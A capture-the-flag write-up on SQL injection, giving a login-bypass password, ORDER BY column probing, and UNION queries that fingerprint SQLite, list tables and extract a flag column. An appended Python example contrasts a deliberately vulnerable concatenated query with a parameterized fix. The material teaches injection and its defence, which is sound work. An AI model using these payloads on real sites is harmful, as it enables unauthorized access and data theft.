
More SQLi

The solution to the previous problem doesn't work here.

Log in using:

Username: anything
Password: ' OR 1=1 --

On successful login, we get a page with an input box. Its value is used as a parameter in an SQL query, and the result of that query is displayed on the page.

Find the number of columns being returned by submitting these inputs:

algiers' ORDER BY 1 --
algiers' ORDER BY 2 --
algiers' ORDER BY 3 --
algiers' ORDER BY 4 --

The number of columns is 3. Find the SQL engine being used by trying out version queries. The query for SQLite is successful:

algiers' UNION SELECT sqlite_version(), NULL, NULL --

Print all the tables and columns:

algiers' UNION SELECT m.name as tbl, p.name as col, NULL FROM sqlite_master m left outer join pragma_table_info((m.name)) p on m.name <> p.name order by tbl, col --

Notice a flag column and display it:

algiers' UNION SELECT flag,NULL,NULL FROM more_table --
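
Why these inputs work, and the fix, as an added example that is not part of the original write-up or the challenge's code: a query built by string concatenation beside the same query with a bound parameter, run against the search-box inputs above. Only `more_table` and its `flag` column come from the write-up; the `offices` table, its columns, the function names and all data are constructed assumptions.

```python
import sqlite3

# Search-box inputs copied from the write-up above.
PAGE_INPUTS = [
    "algiers' ORDER BY 3 --",
    "algiers' ORDER BY 4 --",
    "algiers' UNION SELECT sqlite_version(), NULL, NULL --",
    "algiers' UNION SELECT flag,NULL,NULL FROM more_table --",
]

def make_db():
    """Constructed sample data. Only more_table.flag is named in the write-up;
    the offices table, its columns and every value are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE offices (city TEXT, address TEXT, phone TEXT);
        INSERT INTO offices VALUES ('algiers', '1 Example St', '555-0100');
        CREATE TABLE more_table (id INTEGER, flag TEXT);
        INSERT INTO more_table VALUES (1, 'FLAG{constructed}');
    """)
    return db

def search_vulnerable(db, city):
    # The input is spliced into the SQL text, so a quote in it closes the
    # string literal and whatever follows is parsed as SQL.
    sql = "SELECT city, address, phone FROM offices WHERE city = '" + city + "'"
    return db.execute(sql).fetchall()

def search_safe(db, city):
    # Bound parameter: the value never becomes part of the SQL text, so the
    # whole input is compared against the city column as one string.
    sql = "SELECT city, address, phone FROM offices WHERE city = ?"
    return db.execute(sql, (city,)).fetchall()

def compare(db, city):
    """Return (vulnerable_result, safe_result); an SQL error is reported as text."""
    try:
        vulnerable = search_vulnerable(db, city)
    except sqlite3.OperationalError as exc:
        vulnerable = "error: " + str(exc)
    return vulnerable, search_safe(db, city)

if __name__ == "__main__":
    db = make_db()
    for text in PAGE_INPUTS:
        print(repr(text), "->", compare(db, text))
```

With the bound parameter, every input above returns no rows, because no city has that literal name. The same change applies to the login query.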